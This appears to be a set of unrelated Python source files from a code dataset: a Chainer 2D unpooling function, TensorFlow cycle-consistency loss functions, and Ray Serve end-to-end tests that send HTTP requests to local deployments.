"message": f"Bad Automat response. Contacting registry url: {self.url} \n request: "
f"{json.dumps(request.json, indent=2)} response: \n{response.text}."
}
return result
|
the-stack_0_6269 | from chainer import cuda
from chainer.functions.pooling import pooling_2d
from chainer.utils import conv
from chainer.utils import type_check
class Unpooling2D(pooling_2d.Pooling2D):
"""Unpooling over a set of 2d planes."""
def __init__(self, ksize, stride=None, pad=0,
outsize=None, cover_all=True):
super(Unpooling2D, self).__init__(ksize, stride, pad, cover_all)
self.outh, self.outw = (None, None) if outsize is None else outsize
def check_type_forward(self, in_types):
n_in = in_types.size()
type_check.expect(n_in == 1)
x_type = in_types[0]
type_check.expect(
x_type.dtype.kind == 'f',
x_type.ndim == 4,
)
if self.outh is not None:
expected_h = conv.get_conv_outsize(
self.outh, self.kh, self.sy, self.ph, cover_all=self.cover_all)
type_check.expect(x_type.shape[2] == expected_h)
if self.outw is not None:
expected_w = conv.get_conv_outsize(
self.outw, self.kw, self.sx, self.pw, cover_all=self.cover_all)
type_check.expect(x_type.shape[3] == expected_w)
def forward(self, x):
h, w = x[0].shape[2:]
if self.outh is None:
self.outh = conv.get_deconv_outsize(
h, self.kh, self.sy, self.ph, cover_all=self.cover_all)
if self.outw is None:
self.outw = conv.get_deconv_outsize(
w, self.kw, self.sx, self.pw, cover_all=self.cover_all)
xp = cuda.get_array_module(*x)
col = xp.tile(x[0][:, :, xp.newaxis, xp.newaxis],
(1, 1, self.kh, self.kw, 1, 1))
if isinstance(x[0], cuda.ndarray):
y = conv.col2im_gpu(col, self.sy, self.sx, self.ph, self.pw,
self.outh, self.outw)
else:
y = conv.col2im_cpu(col, self.sy, self.sx, self.ph, self.pw,
self.outh, self.outw)
return y,
def backward(self, x, gy):
if isinstance(gy[0], cuda.ndarray):
gcol = conv.im2col_gpu(
gy[0], self.kh, self.kw, self.sy, self.sx, self.ph, self.pw,
cover_all=self.cover_all)
else:
gcol = conv.im2col_cpu(
gy[0], self.kh, self.kw, self.sy, self.sx, self.ph, self.pw,
cover_all=self.cover_all)
gx = gcol.sum(axis=(2, 3))
return gx,
def unpooling_2d(x, ksize, stride=None, pad=0, outsize=None, cover_all=True):
"""Inverse operation of pooling for 2d array.
    This function acts similarly to :class:`~functions.Deconvolution2D`, but
    it spreads the values of the input 2d array over a larger region without
    any learned parameters, instead of computing inner products.
Args:
x (~chainer.Variable): Input variable.
ksize (int or pair of ints): Size of pooling window. ``ksize=k`` and
``ksize=(k, k)`` are equivalent.
stride (int, pair of ints or None): Stride of pooling applications.
``stride=s`` and ``stride=(s, s)`` are equivalent. If ``None`` is
specified, then it uses same stride as the pooling window size.
pad (int or pair of ints): Spatial padding width for the input array.
``pad=p`` and ``pad=(p, p)`` are equivalent.
outsize (None or pair of ints): Expected output size (height, width)
of array after the operation. If ``None``, the size
(height or width) is estimated from the size of input array
in first batch with
:func:`~chainer.utils.conv.get_deconv_outsize`.
If outsize is not ``None``, the result of outsize applied to
:func:`~chainer.utils.conv.get_conv_outsize` must be equal to
the shape of the 2d array in the input batch ``x``.
cover_all (bool): If ``True``, all spatial locations are pooled
into some output pixels, and the output size is larger than that
when cover_all is ``False``.
Returns:
~chainer.Variable: Output variable.
"""
return Unpooling2D(ksize, stride, pad, outsize, cover_all)(x)
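# A minimal usage sketch (not part of the original module): each input value
# is repeated over a ksize x ksize block, so with cover_all=False a 2x2 map
# becomes a 4x4 map.
#
#     import numpy as np
#     from chainer import Variable
#     x = Variable(np.arange(4, dtype=np.float32).reshape(1, 1, 2, 2))
#     y = unpooling_2d(x, ksize=2, cover_all=False)  # y.data.shape == (1, 1, 4, 4)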
|
the-stack_0_6270 | # coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Loss functions imposing the cycle-consistency constraints."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
def classification_loss(logits, labels, label_smoothing):
"""Loss function based on classifying the correct indices.
In the paper, this is called Cycle-back Classification.
Args:
logits: Tensor, Pre-softmax scores used for classification loss. These are
similarity scores after cycling back to the starting sequence.
labels: Tensor, One hot labels containing the ground truth. The index where
the cycle started is 1.
label_smoothing: Float, label smoothing factor which can be used to
determine how hard the alignment should be.
Returns:
loss: Tensor, A scalar classification loss calculated using standard softmax
cross-entropy loss.
"""
# Just to be safe, we stop gradients from labels as we are generating labels.
labels = tf.stop_gradient(labels)
return tf.reduce_mean(tf.keras.losses.categorical_crossentropy(
y_true=labels, y_pred=logits, from_logits=True,
label_smoothing=label_smoothing))
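# Hedged shape sketch (illustrative, not from the original file): for a batch
# of N cycles over T candidate frames, `logits` and `labels` are both [N, T],
# with labels[i] one-hot at the frame where cycle i started.
#
#     logits = tf.random.normal([8, 32])
#     labels = tf.one_hot(tf.random.uniform([8], maxval=32, dtype=tf.int32), 32)
#     loss = classification_loss(logits, labels, label_smoothing=0.1)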
def regression_loss(logits, labels, num_steps, steps, seq_lens, loss_type,
normalize_indices, variance_lambda, huber_delta):
"""Loss function based on regressing to the correct indices.
In the paper, this is called Cycle-back Regression. There are 3 variants
of this loss:
i) regression_mse: MSE of the predicted indices and ground truth indices.
ii) regression_mse_var: MSE of the predicted indices that takes into account
the variance of the similarities. This is important when the rate at which
sequences go through different phases changes a lot. The variance scaling
allows dynamic weighting of the MSE loss based on the similarities.
iii) regression_huber: Huber loss between the predicted indices and ground
truth indices.
Args:
logits: Tensor, Pre-softmax similarity scores after cycling back to the
starting sequence.
labels: Tensor, One hot labels containing the ground truth. The index where
the cycle started is 1.
num_steps: Integer, Number of steps in the sequence embeddings.
steps: Tensor, step indices/frame indices of the embeddings of the shape
[N, T] where N is the batch size, T is the number of the timesteps.
seq_lens: Tensor, Lengths of the sequences from which the sampling was done.
This can provide additional temporal information to the alignment loss.
loss_type: String, This specifies the kind of regression loss function.
Currently supported loss functions: regression_mse, regression_mse_var,
regression_huber.
normalize_indices: Boolean, If True, normalizes indices by sequence lengths.
Useful for ensuring numerical instabilities don't arise as sequence
indices can be large numbers.
variance_lambda: Float, Weight of the variance of the similarity
predictions while cycling back. If this is high then the low variance
similarities are preferred by the loss while making this term low results
in high variance of the similarities (more uniform/random matching).
huber_delta: float, Huber delta described in tf.keras.losses.huber_loss.
Returns:
loss: Tensor, A scalar loss calculated using a variant of regression.
"""
# Just to be safe, we stop gradients from labels as we are generating labels.
labels = tf.stop_gradient(labels)
steps = tf.stop_gradient(steps)
if normalize_indices:
float_seq_lens = tf.cast(seq_lens, tf.float32)
tile_seq_lens = tf.tile(
tf.expand_dims(float_seq_lens, axis=1), [1, num_steps])
steps = tf.cast(steps, tf.float32) / tile_seq_lens
else:
steps = tf.cast(steps, tf.float32)
beta = tf.nn.softmax(logits)
true_time = tf.reduce_sum(steps * labels, axis=1)
pred_time = tf.reduce_sum(steps * beta, axis=1)
if loss_type in ['regression_mse', 'regression_mse_var']:
if 'var' in loss_type:
# Variance aware regression.
pred_time_tiled = tf.tile(tf.expand_dims(pred_time, axis=1),
[1, num_steps])
pred_time_variance = tf.reduce_sum(
tf.square(steps - pred_time_tiled) * beta, axis=1)
# Using log of variance as it is numerically stabler.
pred_time_log_var = tf.math.log(pred_time_variance)
squared_error = tf.square(true_time - pred_time)
return tf.reduce_mean(tf.math.exp(-pred_time_log_var) * squared_error
+ variance_lambda * pred_time_log_var)
else:
return tf.reduce_mean(
tf.keras.losses.mean_squared_error(y_true=true_time,
y_pred=pred_time))
elif loss_type == 'regression_huber':
return tf.reduce_mean(tf.keras.losses.huber_loss(
y_true=true_time, y_pred=pred_time,
delta=huber_delta))
else:
raise ValueError('Unsupported regression loss %s. Supported losses are: '
                     'regression_mse, regression_mse_var and regression_huber.'
% loss_type)
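# In the 'regression_mse_var' branch above, with mu = sum_t(beta_t * t) and
# log_var = log(sum_t(beta_t * (t - mu)^2)), the per-example loss is
# exp(-log_var) * (true_t - mu)^2 + variance_lambda * log_var: a
# variance-weighted squared error plus a variance regularizer.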
|
the-stack_0_6271 | import asyncio
import time
import os
import requests
import pytest
import starlette.responses
import ray
from ray import serve
from ray._private.test_utils import SignalActor, wait_for_condition
def test_e2e(serve_instance):
@serve.deployment(name="api")
def function(starlette_request):
return {"method": starlette_request.method}
function.deploy()
resp = requests.get("http://127.0.0.1:8000/api").json()["method"]
assert resp == "GET"
resp = requests.post("http://127.0.0.1:8000/api").json()["method"]
assert resp == "POST"
def test_starlette_response(serve_instance):
@serve.deployment(name="basic")
def basic(_):
return starlette.responses.Response("Hello, world!", media_type="text/plain")
basic.deploy()
assert requests.get("http://127.0.0.1:8000/basic").text == "Hello, world!"
@serve.deployment(name="html")
def html(_):
return starlette.responses.HTMLResponse(
"<html><body><h1>Hello, world!</h1></body></html>"
)
html.deploy()
assert (
requests.get("http://127.0.0.1:8000/html").text
== "<html><body><h1>Hello, world!</h1></body></html>"
)
@serve.deployment(name="plain_text")
def plain_text(_):
return starlette.responses.PlainTextResponse("Hello, world!")
plain_text.deploy()
assert requests.get("http://127.0.0.1:8000/plain_text").text == "Hello, world!"
@serve.deployment(name="json")
def json(_):
return starlette.responses.JSONResponse({"hello": "world"})
json.deploy()
assert requests.get("http://127.0.0.1:8000/json").json()["hello"] == "world"
@serve.deployment(name="redirect")
def redirect(_):
return starlette.responses.RedirectResponse(url="http://127.0.0.1:8000/basic")
redirect.deploy()
assert requests.get("http://127.0.0.1:8000/redirect").text == "Hello, world!"
@serve.deployment(name="streaming")
def streaming(_):
async def slow_numbers():
for number in range(1, 4):
yield str(number)
await asyncio.sleep(0.01)
return starlette.responses.StreamingResponse(
slow_numbers(), media_type="text/plain", status_code=418
)
streaming.deploy()
resp = requests.get("http://127.0.0.1:8000/streaming")
assert resp.text == "123"
assert resp.status_code == 418
def test_deploy_sync_function_no_params(serve_instance):
@serve.deployment()
def sync_d():
return "sync!"
serve.start()
sync_d.deploy()
assert requests.get("http://localhost:8000/sync_d").text == "sync!"
assert ray.get(sync_d.get_handle().remote()) == "sync!"
def test_deploy_async_function_no_params(serve_instance):
@serve.deployment()
async def async_d():
await asyncio.sleep(5)
return "async!"
serve.start()
async_d.deploy()
assert requests.get("http://localhost:8000/async_d").text == "async!"
assert ray.get(async_d.get_handle().remote()) == "async!"
def test_deploy_sync_class_no_params(serve_instance):
@serve.deployment
class Counter:
def __init__(self):
self.count = 0
def __call__(self):
self.count += 1
return {"count": self.count}
serve.start()
Counter.deploy()
assert requests.get("http://127.0.0.1:8000/Counter").json() == {"count": 1}
assert requests.get("http://127.0.0.1:8000/Counter").json() == {"count": 2}
assert ray.get(Counter.get_handle().remote()) == {"count": 3}
def test_deploy_async_class_no_params(serve_instance):
@serve.deployment
class AsyncCounter:
async def __init__(self):
await asyncio.sleep(5)
self.count = 0
async def __call__(self):
self.count += 1
await asyncio.sleep(5)
return {"count": self.count}
serve.start()
AsyncCounter.deploy()
assert requests.get("http://127.0.0.1:8000/AsyncCounter").json() == {"count": 1}
assert requests.get("http://127.0.0.1:8000/AsyncCounter").json() == {"count": 2}
assert ray.get(AsyncCounter.get_handle().remote()) == {"count": 3}
def test_user_config(serve_instance):
@serve.deployment("counter", num_replicas=2, user_config={"count": 123, "b": 2})
class Counter:
def __init__(self):
self.count = 10
def __call__(self, *args):
return self.count, os.getpid()
def reconfigure(self, config):
self.count = config["count"]
Counter.deploy()
handle = Counter.get_handle()
def check(val, num_replicas):
pids_seen = set()
for i in range(100):
result = ray.get(handle.remote())
if str(result[0]) != val:
return False
pids_seen.add(result[1])
return len(pids_seen) == num_replicas
wait_for_condition(lambda: check("123", 2))
Counter = Counter.options(num_replicas=3)
Counter.deploy()
wait_for_condition(lambda: check("123", 3))
Counter = Counter.options(user_config={"count": 456})
Counter.deploy()
wait_for_condition(lambda: check("456", 3))
def test_reject_duplicate_route(serve_instance):
@serve.deployment(name="A", route_prefix="/api")
class A:
pass
A.deploy()
with pytest.raises(ValueError):
A.options(name="B").deploy()
def test_scaling_replicas(serve_instance):
@serve.deployment(name="counter", num_replicas=2)
class Counter:
def __init__(self):
self.count = 0
def __call__(self, _):
self.count += 1
return self.count
Counter.deploy()
counter_result = []
for _ in range(10):
resp = requests.get("http://127.0.0.1:8000/counter").json()
counter_result.append(resp)
    # If the load is shared among two replicas, the max result cannot be 10.
assert max(counter_result) < 10
Counter.options(num_replicas=1).deploy()
counter_result = []
for _ in range(10):
resp = requests.get("http://127.0.0.1:8000/counter").json()
counter_result.append(resp)
    # Give some time for a replica to spin down. The majority of the requests
    # should be served by the only remaining replica.
assert max(counter_result) - min(counter_result) > 6
def test_delete_deployment(serve_instance):
@serve.deployment(name="delete")
def function(_):
return "hello"
function.deploy()
assert requests.get("http://127.0.0.1:8000/delete").text == "hello"
function.delete()
@serve.deployment(name="delete")
def function2(_):
return "olleh"
function2.deploy()
for _ in range(10):
try:
assert requests.get("http://127.0.0.1:8000/delete").text == "olleh"
break
except AssertionError:
time.sleep(0.5) # Wait for the change to propagate.
else:
assert requests.get("http://127.0.0.1:8000/delete").text == "olleh"
def test_starlette_request(serve_instance):
@serve.deployment(name="api")
async def echo_body(starlette_request):
data = await starlette_request.body()
return data
echo_body.deploy()
# Long string to test serialization of multiple messages.
UVICORN_HIGH_WATER_MARK = 65536 # max bytes in one message
long_string = "x" * 10 * UVICORN_HIGH_WATER_MARK
resp = requests.post("http://127.0.0.1:8000/api", data=long_string).text
assert resp == long_string
def test_start_idempotent(serve_instance):
@serve.deployment(name="start")
def func(*args):
pass
func.deploy()
assert "start" in serve.list_deployments()
serve.start(detached=True)
serve.start()
serve.start(detached=True)
serve.start()
assert "start" in serve.list_deployments()
def test_shutdown_destructor(serve_instance):
signal = SignalActor.remote()
@serve.deployment
class A:
def __del__(self):
signal.send.remote()
A.deploy()
A.delete()
ray.get(signal.wait.remote(), timeout=10)
# If the destructor errored, it should be logged but also cleaned up.
@serve.deployment
class B:
def __del__(self):
raise RuntimeError("Opps")
B.deploy()
B.delete()
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", "-s", __file__]))
|